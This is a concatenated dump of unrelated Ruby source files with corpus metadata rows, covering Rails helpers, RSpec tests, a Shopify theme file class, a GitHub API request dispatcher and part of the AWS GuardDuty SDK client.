              "CF_DIEGO_RUN_BETA" => "true"
            }
            app = AppFactory.make(environment_json: environment)

            get "/bulk/apps", {
              "batch_size" => 20,
              "bulk_token" => "{}",
            }
            expect(last_response.status).to eq(200)
            expect(decoded_response["results"].size).to eq(6)
            expect(decoded_response["results"]).to include(app.guid)
          end
        end

        # With diego running optional, diego-opted-in apps are handled by
        # diego and excluded here.
        context "when diego_running is set to optional" do
          before do
            allow(Config.config).to receive(:[]).with(anything).and_call_original
            allow(Config.config).to receive(:[]).with(:diego).and_return(
              staging: 'optional',
              running: 'optional',
            )
            LegacyBulk.configure(Config.config, mbus)
          end

          it "does not include diego apps" do
            environment = {
              "CF_DIEGO_RUN_BETA" => "true"
            }
            app = AppFactory.make(environment_json: environment)

            get "/bulk/apps", {
              "batch_size" => 20,
              "bulk_token" => "{}",
            }
            expect(last_response.status).to eq(200)
            expect(decoded_response["results"]).to_not include(app.guid)
            expect(decoded_response["results"].size).to eq(5)
          end
        end
      end
    end
    describe "GET", "/bulk/counts" do
      it "requires authentication" do
        get "/bulk/counts", {"model" => "user"}
        expect(last_response.status).to eq(401)
      end

      it "returns the number of users" do
        4.times { User.make }
        authorize @bulk_user, @bulk_password
        get "/bulk/counts", {"model" => "user"}
        expect(decoded_response["counts"]).to include("user" => kind_of(Integer))
        expect(decoded_response["counts"]["user"]).to eq(User.count)
      end
    end
  end
end
| 31.568075 | 102 | 0.542385 |
e9f9767eb45f2487713a9e1eea39deb39621501b | 1,142 | require 'spec_helper'
RSpec.describe HackingProgram do
  let(:passphrase) { 'welcome' }
  let(:record) do
    DataSources::Record.new({
      source: 'foo',
      passphrase: passphrase,
      start_node: 'bar',
      end_node: 'baz',
      start_time: Time.now.to_s,
      end_time: Time.now.to_s,
    })
  end
  let(:records_sets) { [DataSources::RecordsSet.new([record])] }
  let(:logger) { double('Logger', error: true) }
  let(:file_content) { File.read("spec/fixtures/loopholes.zip") }
  let(:answer) { File.read("spec/fixtures/answer.json") }

  # Stub all Terminal traffic: downloads succeed, uploads return 503.
  before do
    stub_request(:get, /#{Terminal::DOMAIN}.*/).
      to_return(:status => 200, :body => file_content)
    stub_request(:post, /#{Terminal::DOMAIN}.*/).
      to_return(status: 503, body: answer)
  end

  subject do
    described_class.new(logger: logger).tap do |o|
      o.passphrase = passphrase
      o.records_sets = records_sets
      o.terminal = Terminal
    end
  end

  describe '#hack' do
    it 'imports data' do
      expect(logger).to receive(:error).exactly(4).times
      expect(logger).to receive(:info).with("STATUS 503")
      subject.hack
    end
  end
end
| 26.55814 | 65 | 0.636602 |
ffe5e42ae36d38d5a4df2e023af8049582426271 | 1,088 | module ApplicationHelper
  # Helper function for including CSS in the head.
  # Emits a stylesheet tag into the :page_assets or :layout_assets
  # content_for bucket, at most once per filename per render.
  # NOTE(review): the memo key is the filename only, not (filename, type) —
  # the same file requested as both :page and :layout is emitted once;
  # confirm that is intended.
  def css_for_head filename, type=:page
    @head_css_cache = {} if @head_css_cache.nil?
    content_symbol = type == :page ? :page_assets : :layout_assets
    content_for content_symbol do
      stylesheet_link_tag("/css/" + filename)
    end if @head_css_cache[filename].nil?
    @head_css_cache[filename] = true
  end

  # Helper function for including JS in the head.
  # Same dedupe behavior (and same filename-only memo key) as css_for_head.
  def js_for_head filename, type=:page
    @head_js_cache = {} if @head_js_cache.nil?
    content_symbol = type == :page ? :page_assets : :layout_assets
    content_for content_symbol do
      javascript_include_tag("/js/" + filename)
    end if @head_js_cache[filename].nil?
    @head_js_cache[filename] = true
  end

  # Helper function for including JS in the body.
  # Unlike the head helpers, this returns the tag directly (or nil when the
  # file has already been emitted) instead of using content_for.
  # NOTE(review): `type` is accepted but unused here.
  def js_for_body filename, type=:page
    @body_js_cache = {} if @body_js_cache.nil?
    return unless @body_js_cache[filename].nil?
    @body_js_cache[filename] = true
    javascript_include_tag("/js/" + filename)
  end
end
| 27.2 | 66 | 0.683824 |
798dd8661417e1a18cdd850f4a6b48d7d3875209 | 1,325 | module Rabl
# DependencyTracker for ActionView to support cache digest
class Tracker
# Matches:
# extends "categories/show"
EXTENDS_DEPENDENCY = /
extends\s* # extends, followed by optional whitespace
\(? # start an optional parenthesis for the extends call
\s*["']([a-z_\/\.]+) # the template name itself
/x
# Matches:
# partial "categories/show"
PARTIAL_DEPENDENCY = /
partial\s* # partial, followed by optional whitespace
\(? # start an optional parenthesis for the partial call
\s*["']([a-z_\/\.]+) # the template name itself
/x
def self.call(name, template)
new(name, template).dependencies
end
def initialize(name, template)
@name, @template = name, template
end
def dependencies
(extends_dependencies + partial_dependencies).uniq
end
attr_reader :name, :template
private :name, :template
private
def source
template.source
end
def directory
name.split("/")[0..-2].join("/")
end
def extends_dependencies
source.scan(EXTENDS_DEPENDENCY).flatten
end
def partial_dependencies
source.scan(PARTIAL_DEPENDENCY).flatten
end
end
end
| 24.537037 | 82 | 0.594717 |
bfbe8acab1f30000bb375ff6fe7d4338d7229e7d | 197 | # frozen_string_literal: true
class AddPidToExecutionsAndRuns < ActiveRecord::Migration[5.2]
def change
add_column :executions, :pid, :integer
add_column :runs, :pid, :integer
end
end
| 21.888889 | 62 | 0.746193 |
e925a8b89a0d233e12d9f470f395b1f23f0214d5 | 205 | # frozen_string_literal: true
module TodoLists
class Create
include RailsEventSourcing::Command
attributes :name
def build_event
TodoLists::Created.new(name: name)
end
end
end
| 14.642857 | 40 | 0.717073 |
6ad2d83dd7c1dde403f26874519e601d326c3d4d | 3,085 | # frozen_string_literal: true
require_relative "mime_type"
module ShopifyCLI
module Theme
class File < Struct.new(:path)
attr_accessor :remote_checksum
def initialize(path, root)
super(Pathname.new(path))
# Path may be relative or absolute depending on the source.
# By converting both the path and the root to absolute paths, we
# can safely fetch a relative path.
@relative_path = self.path.expand_path.relative_path_from(root.expand_path)
end
def read
if text?
path.read(universal_newline: true)
else
path.read(mode: "rb")
end
end
def write(content)
path.parent.mkpath unless path.parent.directory?
if text?
path.write(content, universal_newline: true)
else
path.write(content, 0, mode: "wb")
end
end
def delete
path.delete
end
def exist?
path.exist?
end
def mime_type
@mime_type ||= MimeType.by_filename(@relative_path)
end
def text?
mime_type.text?
end
def liquid?
path.extname == ".liquid"
end
def liquid_css?
relative_path.end_with?(".css.liquid")
end
def json?
path.extname == ".json"
end
def template?
relative_path.start_with?("templates/")
end
def checksum
content = read
if mime_type.json?
# Normalize JSON to match backend
begin
content = normalize_json(content)
rescue JSON::JSONError
# Fallback to using the raw content
end
end
Digest::MD5.hexdigest(content)
end
# Make it possible to check whether a given File is within a list of Files with `include?`,
# some of which may be relative paths while others are absolute paths.
def ==(other)
relative_path == other.relative_path
end
def name(*args)
::File.basename(path, *args)
end
def absolute_path
path.realpath.to_s
end
def relative_path
@relative_path.to_s
end
private
def normalize_json(content)
parsed = JSON.parse(content)
if template?
JsonTemplateNormalizer.new.visit_document(parsed)
end
normalized = JSON.generate(parsed)
# Backend escapes forward slashes
normalized.gsub!(/\//, "\\/")
normalized
end
class JsonTemplateNormalizer
def visit_document(value)
visit_hash(value["sections"])
end
def visit_hash(hash)
return unless hash.is_a?(Hash)
hash.each do |_, value|
visit_value(value)
end
end
def visit_value(value)
# Reinsert settings to force the same ordering as in the backend
settings = value.delete("settings") || {}
value["settings"] = settings
visit_hash(value["blocks"])
end
end
end
end
end
| 22.683824 | 97 | 0.576337 |
212c8f8bf33ca5310862c32caf5944d1b9671f5b | 330 | module Cryptoexchange::Exchanges
module Btcexa
class Market < Cryptoexchange::Models::Market
NAME = 'btcexa'
API_URL = 'https://api.btcexa.com/api'
def self.trade_page_url(args={})
"https://btcexa.com/exchange?tag=#{args[:target]}&name=#{args[:base]}_#{args[:target]}"
end
end
end
end
| 25.384615 | 95 | 0.636364 |
1a7b32e82cb51ec36407224875420c9eb370225e | 858 | require 'spec_helper'
RSpec.describe 'Inheritance relation hierarchy' do
include_context 'container'
before do
module Test
class Users < ROM::Relation[:memory]
schema(:users) { }
def by_email(email)
restrict(email: email)
end
end
class OtherUsers < Users
schema(:other_users) { }
end
end
configuration.register_relation(Test::Users, Test::OtherUsers)
end
it 'registers parent and descendant relations' do
users = container.relations[:users]
other_users = container.relations[:other_users]
expect(users).to be_instance_of(Test::Users)
expect(other_users).to be_instance_of(Test::OtherUsers)
jane = { name: 'Jane', email: '[email protected]' }
other_users.insert(jane)
expect(other_users.by_email('[email protected]').one).to eql(jane)
end
end
| 22.578947 | 66 | 0.667832 |
4aea276db968b35aa3252bf8f60c81cf2edc6675 | 2,361 | class Entry < ApplicationRecord
belongs_to :category
belongs_to :user
belongs_to :request, optional: true
has_many :thoughts
has_many :entries_cards
has_many :cards, through: :entries_cards
validates :interpretation_1, :interpretation_2, :interpretation_3, presence: true, if: -> { request_id.present? }
validates_presence_of :category, :message => "A spread must be selected from the menu or created with three custom questions"
validates_presence_of :card_ids, presence: true, if: -> { request_id.present? }, :message => "- All three cards must be selected"
validates_length_of :card_ids, maximum: 3
validate :card_id_uniqueness
scope :this_month, -> { where(created_at: Time.now.beginning_of_month..Time.now.end_of_month) }
scope :major_cards, -> { joins(:cards).where("cards.designation = ?", "Major") }
scope :minor_cards, -> { joins(:cards).where("cards.designation = ?", "Minor") }
scope :court_cards, -> { joins(:cards).where("cards.court = ?", true) }
scope :cup_cards, -> { joins(:cards).where("cards.suit = ?", "Cups") }
scope :pentacle_cards, -> { joins(:cards).where("cards.suit = ?", "Pentacles") }
scope :sword_cards, -> { joins(:cards).where("cards.suit = ?", "Swords") }
scope :wand_cards, -> { joins(:cards).where("cards.suit = ?", "Wands") }
def card_id_uniqueness
errors.add(:card, "cannot be selected twice from the same deck") unless card_ids == card_ids.uniq
end
def add_randomized_card
until !self.cards.include?(random_card = Card.randomize) do
random_card = Card.randomize
end
self.cards << random_card
end
def category_attributes=(category_attributes)
if category_attributes[:question_1].present? && category_attributes[:question_2].present? && category_attributes[:question_3].present?
self.build_category(category_attributes)
end
end
def self.filter_by_spread(category_name)
category_name.present? ? self.joins(:category).where(categories: {name: category_name} ) : self.all
end
def self.filter_by_card(card_id)
card_id.present? ? self.joins(:cards).where("cards.id = ?", card_id) : self.all
end
def self.total_cards
self.all.size * 3
end
def display_date_created
self.created_at.strftime("%B %e, %Y at %l:%M%p")
end
def display_date_created_short
self.created_at.strftime("%B %e, %Y")
end
end
| 40.016949 | 138 | 0.707327 |
217fa8dcef748fed41ef01e5d6b643e82625fe6b | 2,311 | # encoding: utf-8
require 'github_api/request/oauth2'
require 'github_api/request/basic_auth'
require 'github_api/request/jsonize'
require 'github_api/connection'
module Github
# A class responsible for dispatching http requests
class Request
include Connection
HTTP_METHODS = [:get, :head, :post, :put, :delete, :patch]
METHODS_WITH_BODIES = [:post, :put, :patch]
# Return http verb
#
# @return [Symbol]
attr_reader :action
# Return url
#
# @return [String]
attr_accessor :path
# Return api this request is associated with
#
# @return [Github::API]
attr_reader :api
# Create a new Request
#
# @return [Github::Request]
#
# @api public
def initialize(action, path, api)
@action = action
@path = path
@api = api
end
# Performs a request
#
# @param [Symbol] method - The Symbol the HTTP verb
# @param [String] path - String relative URL to access
# @param [ParamsHash] params - ParamsHash to configure the request API
#
# @return [Github::ResponseWrapper]
#
# @api private
def call(current_options, params)
unless HTTP_METHODS.include?(action)
raise ArgumentError, "unknown http method: #{method}"
end
puts "EXECUTED: #{action} - #{path} with PARAMS: #{params}" if ENV['DEBUG']
request_options = params.options
connection_options = current_options.merge(request_options)
conn = connection(api, connection_options)
if conn.path_prefix != '/' && self.path.index(conn.path_prefix) != 0
self.path = (conn.path_prefix + self.path).gsub(/\/(\/)*/, '/')
end
response = conn.send(action) do |request|
case action.to_sym
when *(HTTP_METHODS - METHODS_WITH_BODIES)
request.body = params.data if params.has_key?('data')
if params.has_key?('encoder')
request.params.params_encoder(params.encoder)
end
request.url(self.path, params.to_hash)
when *METHODS_WITH_BODIES
request.url(self.path, connection_options[:query] || {})
request.body = params.data unless params.empty?
end
end
ResponseWrapper.new(response, api)
end
end # Request
end # Github
| 27.188235 | 81 | 0.62527 |
e94e3a3879567e9264eda8ef019315859a2704ec | 125,406 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'seahorse/client/plugins/content_length.rb'
require 'aws-sdk-core/plugins/credentials_configuration.rb'
require 'aws-sdk-core/plugins/logging.rb'
require 'aws-sdk-core/plugins/param_converter.rb'
require 'aws-sdk-core/plugins/param_validator.rb'
require 'aws-sdk-core/plugins/user_agent.rb'
require 'aws-sdk-core/plugins/helpful_socket_errors.rb'
require 'aws-sdk-core/plugins/retry_errors.rb'
require 'aws-sdk-core/plugins/global_configuration.rb'
require 'aws-sdk-core/plugins/regional_endpoint.rb'
require 'aws-sdk-core/plugins/endpoint_discovery.rb'
require 'aws-sdk-core/plugins/endpoint_pattern.rb'
require 'aws-sdk-core/plugins/response_paging.rb'
require 'aws-sdk-core/plugins/stub_responses.rb'
require 'aws-sdk-core/plugins/idempotency_token.rb'
require 'aws-sdk-core/plugins/jsonvalue_converter.rb'
require 'aws-sdk-core/plugins/client_metrics_plugin.rb'
require 'aws-sdk-core/plugins/client_metrics_send_plugin.rb'
require 'aws-sdk-core/plugins/transfer_encoding.rb'
require 'aws-sdk-core/plugins/http_checksum.rb'
require 'aws-sdk-core/plugins/signature_v4.rb'
require 'aws-sdk-core/plugins/protocols/rest_json.rb'
Aws::Plugins::GlobalConfiguration.add_identifier(:guardduty)
module Aws::GuardDuty
# An API client for GuardDuty. To construct a client, you need to configure a `:region` and `:credentials`.
#
# client = Aws::GuardDuty::Client.new(
# region: region_name,
# credentials: credentials,
# # ...
# )
#
# For details on configuring region and credentials see
# the [developer guide](/sdk-for-ruby/v3/developer-guide/setup-config.html).
#
# See {#initialize} for a full list of supported configuration options.
class Client < Seahorse::Client::Base
include Aws::ClientStubs
@identifier = :guardduty
set_api(ClientApi::API)
add_plugin(Seahorse::Client::Plugins::ContentLength)
add_plugin(Aws::Plugins::CredentialsConfiguration)
add_plugin(Aws::Plugins::Logging)
add_plugin(Aws::Plugins::ParamConverter)
add_plugin(Aws::Plugins::ParamValidator)
add_plugin(Aws::Plugins::UserAgent)
add_plugin(Aws::Plugins::HelpfulSocketErrors)
add_plugin(Aws::Plugins::RetryErrors)
add_plugin(Aws::Plugins::GlobalConfiguration)
add_plugin(Aws::Plugins::RegionalEndpoint)
add_plugin(Aws::Plugins::EndpointDiscovery)
add_plugin(Aws::Plugins::EndpointPattern)
add_plugin(Aws::Plugins::ResponsePaging)
add_plugin(Aws::Plugins::StubResponses)
add_plugin(Aws::Plugins::IdempotencyToken)
add_plugin(Aws::Plugins::JsonvalueConverter)
add_plugin(Aws::Plugins::ClientMetricsPlugin)
add_plugin(Aws::Plugins::ClientMetricsSendPlugin)
add_plugin(Aws::Plugins::TransferEncoding)
add_plugin(Aws::Plugins::HttpChecksum)
add_plugin(Aws::Plugins::SignatureV4)
add_plugin(Aws::Plugins::Protocols::RestJson)
# @overload initialize(options)
# @param [Hash] options
# @option options [required, Aws::CredentialProvider] :credentials
# Your AWS credentials. This can be an instance of any one of the
# following classes:
#
# * `Aws::Credentials` - Used for configuring static, non-refreshing
# credentials.
#
# * `Aws::InstanceProfileCredentials` - Used for loading credentials
# from an EC2 IMDS on an EC2 instance.
#
# * `Aws::SharedCredentials` - Used for loading credentials from a
# shared file, such as `~/.aws/config`.
#
# * `Aws::AssumeRoleCredentials` - Used when you need to assume a role.
#
# When `:credentials` are not configured directly, the following
# locations will be searched for credentials:
#
# * `Aws.config[:credentials]`
# * The `:access_key_id`, `:secret_access_key`, and `:session_token` options.
# * ENV['AWS_ACCESS_KEY_ID'], ENV['AWS_SECRET_ACCESS_KEY']
# * `~/.aws/credentials`
# * `~/.aws/config`
# * EC2 IMDS instance profile - When used by default, the timeouts are
# very aggressive. Construct and pass an instance of
# `Aws::InstanceProfileCredentails` to enable retries and extended
# timeouts.
#
# @option options [required, String] :region
# The AWS region to connect to. The configured `:region` is
# used to determine the service `:endpoint`. When not passed,
# a default `:region` is searched for in the following locations:
#
# * `Aws.config[:region]`
# * `ENV['AWS_REGION']`
# * `ENV['AMAZON_REGION']`
# * `ENV['AWS_DEFAULT_REGION']`
# * `~/.aws/credentials`
# * `~/.aws/config`
#
# @option options [String] :access_key_id
#
# @option options [Boolean] :active_endpoint_cache (false)
# When set to `true`, a thread polling for endpoints will be running in
# the background every 60 secs (default). Defaults to `false`.
#
# @option options [Boolean] :adaptive_retry_wait_to_fill (true)
# Used only in `adaptive` retry mode. When true, the request will sleep
# until there is sufficent client side capacity to retry the request.
# When false, the request will raise a `RetryCapacityNotAvailableError` and will
# not retry instead of sleeping.
#
# @option options [Boolean] :client_side_monitoring (false)
# When `true`, client-side metrics will be collected for all API requests from
# this client.
#
# @option options [String] :client_side_monitoring_client_id ("")
# Allows you to provide an identifier for this client which will be attached to
# all generated client side metrics. Defaults to an empty string.
#
# @option options [String] :client_side_monitoring_host ("127.0.0.1")
# Allows you to specify the DNS hostname or IPv4 or IPv6 address that the client
# side monitoring agent is running on, where client metrics will be published via UDP.
#
# @option options [Integer] :client_side_monitoring_port (31000)
# Required for publishing client metrics. The port that the client side monitoring
# agent is running on, where client metrics will be published via UDP.
#
# @option options [Aws::ClientSideMonitoring::Publisher] :client_side_monitoring_publisher (Aws::ClientSideMonitoring::Publisher)
# Allows you to provide a custom client-side monitoring publisher class. By default,
# will use the Client Side Monitoring Agent Publisher.
#
# @option options [Boolean] :convert_params (true)
# When `true`, an attempt is made to coerce request parameters into
# the required types.
#
# @option options [Boolean] :correct_clock_skew (true)
# Used only in `standard` and adaptive retry modes. Specifies whether to apply
# a clock skew correction and retry requests with skewed client clocks.
#
# @option options [Boolean] :disable_host_prefix_injection (false)
# Set to true to disable SDK automatically adding host prefix
# to default service endpoint when available.
#
# @option options [String] :endpoint
# The client endpoint is normally constructed from the `:region`
# option. You should only configure an `:endpoint` when connecting
# to test or custom endpoints. This should be a valid HTTP(S) URI.
#
# @option options [Integer] :endpoint_cache_max_entries (1000)
# Used for the maximum size limit of the LRU cache storing endpoints data
# for endpoint discovery enabled operations. Defaults to 1000.
#
# @option options [Integer] :endpoint_cache_max_threads (10)
# Used for the maximum threads in use for polling endpoints to be cached, defaults to 10.
#
# @option options [Integer] :endpoint_cache_poll_interval (60)
# When :endpoint_discovery and :active_endpoint_cache is enabled,
# Use this option to config the time interval in seconds for making
# requests fetching endpoints information. Defaults to 60 sec.
#
# @option options [Boolean] :endpoint_discovery (false)
# When set to `true`, endpoint discovery will be enabled for operations when available.
#
# @option options [Aws::Log::Formatter] :log_formatter (Aws::Log::Formatter.default)
# The log formatter.
#
# @option options [Symbol] :log_level (:info)
# The log level to send messages to the `:logger` at.
#
# @option options [Logger] :logger
# The Logger instance to send log messages to. If this option
# is not set, logging will be disabled.
#
# @option options [Integer] :max_attempts (3)
# An integer representing the maximum number attempts that will be made for
# a single request, including the initial attempt. For example,
# setting this value to 5 will result in a request being retried up to
# 4 times. Used in `standard` and `adaptive` retry modes.
#
# @option options [String] :profile ("default")
# Used when loading credentials from the shared credentials file
# at HOME/.aws/credentials. When not specified, 'default' is used.
#
# @option options [Proc] :retry_backoff
# A proc or lambda used for backoff. Defaults to 2**retries * retry_base_delay.
# This option is only used in the `legacy` retry mode.
#
# @option options [Float] :retry_base_delay (0.3)
# The base delay in seconds used by the default backoff function. This option
# is only used in the `legacy` retry mode.
#
# @option options [Symbol] :retry_jitter (:none)
# A delay randomiser function used by the default backoff function.
# Some predefined functions can be referenced by name - :none, :equal, :full,
# otherwise a Proc that takes and returns a number. This option is only used
# in the `legacy` retry mode.
#
# @see https://www.awsarchitectureblog.com/2015/03/backoff.html
#
# @option options [Integer] :retry_limit (3)
# The maximum number of times to retry failed requests. Only
# ~ 500 level server errors and certain ~ 400 level client errors
# are retried. Generally, these are throttling errors, data
# checksum errors, networking errors, timeout errors, auth errors,
# endpoint discovery, and errors from expired credentials.
# This option is only used in the `legacy` retry mode.
#
# @option options [Integer] :retry_max_delay (0)
# The maximum number of seconds to delay between retries (0 for no limit)
# used by the default backoff function. This option is only used in the
# `legacy` retry mode.
#
# @option options [String] :retry_mode ("legacy")
# Specifies which retry algorithm to use. Values are:
#
# * `legacy` - The pre-existing retry behavior. This is default value if
# no retry mode is provided.
#
# * `standard` - A standardized set of retry rules across the AWS SDKs.
# This includes support for retry quotas, which limit the number of
# unsuccessful retries a client can make.
#
# * `adaptive` - An experimental retry mode that includes all the
# functionality of `standard` mode along with automatic client side
# throttling. This is a provisional mode that may change behavior
# in the future.
#
#
# @option options [String] :secret_access_key
#
# @option options [String] :session_token
#
# @option options [Boolean] :stub_responses (false)
# Causes the client to return stubbed responses. By default
# fake responses are generated and returned. You can specify
# the response data to return or errors to raise by calling
# {ClientStubs#stub_responses}. See {ClientStubs} for more information.
#
# ** Please note ** When response stubbing is enabled, no HTTP
# requests are made, and retries are disabled.
#
# @option options [Boolean] :validate_params (true)
# When `true`, request parameters are validated before
# sending the request.
#
# @option options [URI::HTTP,String] :http_proxy A proxy to send
# requests through. Formatted like 'http://proxy.com:123'.
#
# @option options [Float] :http_open_timeout (15) The number of
# seconds to wait when opening a HTTP session before raising a
# `Timeout::Error`.
#
# @option options [Integer] :http_read_timeout (60) The default
# number of seconds to wait for response data. This value can
# safely be set per-request on the session.
#
# @option options [Float] :http_idle_timeout (5) The number of
# seconds a connection is allowed to sit idle before it is
# considered stale. Stale connections are closed and removed
# from the pool before making a request.
#
# @option options [Float] :http_continue_timeout (1) The number of
# seconds to wait for a 100-continue response before sending the
# request body. This option has no effect unless the request has
# "Expect" header set to "100-continue". Defaults to `nil` which
# disables this behaviour. This value can safely be set per
# request on the session.
#
# @option options [Boolean] :http_wire_trace (false) When `true`,
# HTTP debug output will be sent to the `:logger`.
#
# @option options [Boolean] :ssl_verify_peer (true) When `true`,
# SSL peer certificates are verified when establishing a
# connection.
#
# @option options [String] :ssl_ca_bundle Full path to the SSL
# certificate authority bundle file that should be used when
# verifying peer certificates. If you do not pass
# `:ssl_ca_bundle` or `:ssl_ca_directory` the the system default
# will be used if available.
#
# @option options [String] :ssl_ca_directory Full path of the
# directory that contains the unbundled SSL certificate
# authority files for verifying peer certificates. If you do
# not pass `:ssl_ca_bundle` or `:ssl_ca_directory` the the
# system default will be used if available.
#
def initialize(*args)
super
end
# @!group API Operations
# Accepts the invitation to be monitored by a master GuardDuty account.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty member account.
#
# @option params [required, String] :master_id
# The account ID of the master GuardDuty account whose invitation
# you're accepting.
#
# @option params [required, String] :invitation_id
# The value that is used to validate the master account to the member
# account.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.accept_invitation({
# detector_id: "DetectorId", # required
# master_id: "String", # required
# invitation_id: "String", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/AcceptInvitation AWS API Documentation
#
# @overload accept_invitation(params = {})
# @param [Hash] params ({})
def accept_invitation(params = {}, options = {})
req = build_request(:accept_invitation, params)
req.send_request(options)
end
# Archives GuardDuty findings that are specified by the list of finding
# IDs.
#
# <note markdown="1"> Only the master account can archive findings. Member accounts don't
# have permission to archive findings from their accounts.
#
# </note>
#
# @option params [required, String] :detector_id
# The ID of the detector that specifies the GuardDuty service whose
# findings you want to archive.
#
# @option params [required, Array<String>] :finding_ids
# The IDs of the findings that you want to archive.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.archive_findings({
# detector_id: "DetectorId", # required
# finding_ids: ["FindingId"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ArchiveFindings AWS API Documentation
#
# @overload archive_findings(params = {})
# @param [Hash] params ({})
def archive_findings(params = {}, options = {})
req = build_request(:archive_findings, params)
req.send_request(options)
end
# Creates a single Amazon GuardDuty detector. A detector is a resource
# that represents the GuardDuty service. To start using GuardDuty, you
# must create a detector in each Region where you enable the service.
# You can have only one detector per account per Region.
#
# @option params [required, Boolean] :enable
# A Boolean value that specifies whether the detector is to be enabled.
#
# @option params [String] :client_token
# The idempotency token for the create request.
#
# **A suitable default value is auto-generated.** You should normally
# not need to pass this option.**
#
# @option params [String] :finding_publishing_frequency
# An enum value that specifies how frequently updated findings are
# exported.
#
# @option params [Hash<String,String>] :tags
# The tags to be added to a new detector resource.
#
# @return [Types::CreateDetectorResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateDetectorResponse#detector_id #detector_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_detector({
# enable: false, # required
# client_token: "ClientToken",
# finding_publishing_frequency: "FIFTEEN_MINUTES", # accepts FIFTEEN_MINUTES, ONE_HOUR, SIX_HOURS
# tags: {
# "TagKey" => "TagValue",
# },
# })
#
# @example Response structure
#
# resp.detector_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/CreateDetector AWS API Documentation
#
# @overload create_detector(params = {})
# @param [Hash] params ({})
def create_detector(params = {}, options = {})
req = build_request(:create_detector, params)
req.send_request(options)
end
# Creates a filter using the specified finding criteria.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty account that you want
# to create a filter for.
#
# @option params [required, String] :name
# The name of the filter.
#
# @option params [String] :description
# The description of the filter.
#
# @option params [String] :action
# Specifies the action that is to be applied to the findings that match
# the filter.
#
# @option params [Integer] :rank
# Specifies the position of the filter in the list of current filters.
# Also specifies the order in which this filter is applied to the
# findings.
#
# @option params [required, Types::FindingCriteria] :finding_criteria
# Represents the criteria to be used in the filter for querying
# findings.
#
# You can only use the following attributes to query findings:
#
# * accountId
#
# * region
#
# * confidence
#
# * id
#
# * resource.accessKeyDetails.accessKeyId
#
# * resource.accessKeyDetails.principalId
#
# * resource.accessKeyDetails.userName
#
# * resource.accessKeyDetails.userType
#
# * resource.instanceDetails.iamInstanceProfile.id
#
# * resource.instanceDetails.imageId
#
# * resource.instanceDetails.instanceId
#
# * resource.instanceDetails.outpostArn
#
# * resource.instanceDetails.networkInterfaces.ipv6Addresses
#
# * resource.instanceDetails.networkInterfaces.privateIpAddresses.privateIpAddress
#
# * resource.instanceDetails.networkInterfaces.publicDnsName
#
# * resource.instanceDetails.networkInterfaces.publicIp
#
# * resource.instanceDetails.networkInterfaces.securityGroups.groupId
#
# * resource.instanceDetails.networkInterfaces.securityGroups.groupName
#
# * resource.instanceDetails.networkInterfaces.subnetId
#
# * resource.instanceDetails.networkInterfaces.vpcId
#
# * resource.instanceDetails.tags.key
#
# * resource.instanceDetails.tags.value
#
# * resource.resourceType
#
# * service.action.actionType
#
# * service.action.awsApiCallAction.api
#
# * service.action.awsApiCallAction.callerType
#
# * service.action.awsApiCallAction.remoteIpDetails.city.cityName
#
# * service.action.awsApiCallAction.remoteIpDetails.country.countryName
#
# * service.action.awsApiCallAction.remoteIpDetails.ipAddressV4
#
# * service.action.awsApiCallAction.remoteIpDetails.organization.asn
#
# * service.action.awsApiCallAction.remoteIpDetails.organization.asnOrg
#
# * service.action.awsApiCallAction.serviceName
#
# * service.action.dnsRequestAction.domain
#
# * service.action.networkConnectionAction.blocked
#
# * service.action.networkConnectionAction.connectionDirection
#
# * service.action.networkConnectionAction.localPortDetails.port
#
# * service.action.networkConnectionAction.protocol
#
# * service.action.networkConnectionAction.localIpDetails.ipAddressV4
#
# * service.action.networkConnectionAction.remoteIpDetails.city.cityName
#
# * service.action.networkConnectionAction.remoteIpDetails.country.countryName
#
# * service.action.networkConnectionAction.remoteIpDetails.ipAddressV4
#
# * service.action.networkConnectionAction.remoteIpDetails.organization.asn
#
# * service.action.networkConnectionAction.remoteIpDetails.organization.asnOrg
#
# * service.action.networkConnectionAction.remotePortDetails.port
#
# * service.additionalInfo.threatListName
#
# * service.archived
#
# When this attribute is set to TRUE, only archived findings are
# listed. When it's set to FALSE, only unarchived findings are
# listed. When this attribute is not set, all existing findings are
# listed.
#
# * service.resourceRole
#
# * severity
#
# * type
#
# * updatedAt
#
# Type: ISO 8601 string format: YYYY-MM-DDTHH:MM:SS.SSSZ or
# YYYY-MM-DDTHH:MM:SSZ depending on whether the value contains
# milliseconds.
#
# @option params [String] :client_token
# The idempotency token for the create request.
#
# **A suitable default value is auto-generated.** You should normally
# not need to pass this option.**
#
# @option params [Hash<String,String>] :tags
# The tags to be added to a new filter resource.
#
# @return [Types::CreateFilterResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateFilterResponse#name #name} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_filter({
# detector_id: "DetectorId", # required
# name: "FilterName", # required
# description: "FilterDescription",
# action: "NOOP", # accepts NOOP, ARCHIVE
# rank: 1,
# finding_criteria: { # required
# criterion: {
# "String" => {
# eq: ["String"],
# neq: ["String"],
# gt: 1,
# gte: 1,
# lt: 1,
# lte: 1,
# equals: ["String"],
# not_equals: ["String"],
# greater_than: 1,
# greater_than_or_equal: 1,
# less_than: 1,
# less_than_or_equal: 1,
# },
# },
# },
# client_token: "ClientToken",
# tags: {
# "TagKey" => "TagValue",
# },
# })
#
# @example Response structure
#
# resp.name #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/CreateFilter AWS API Documentation
#
# @overload create_filter(params = {})
# @param [Hash] params ({})
def create_filter(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:create_filter, params).send_request(options)
end
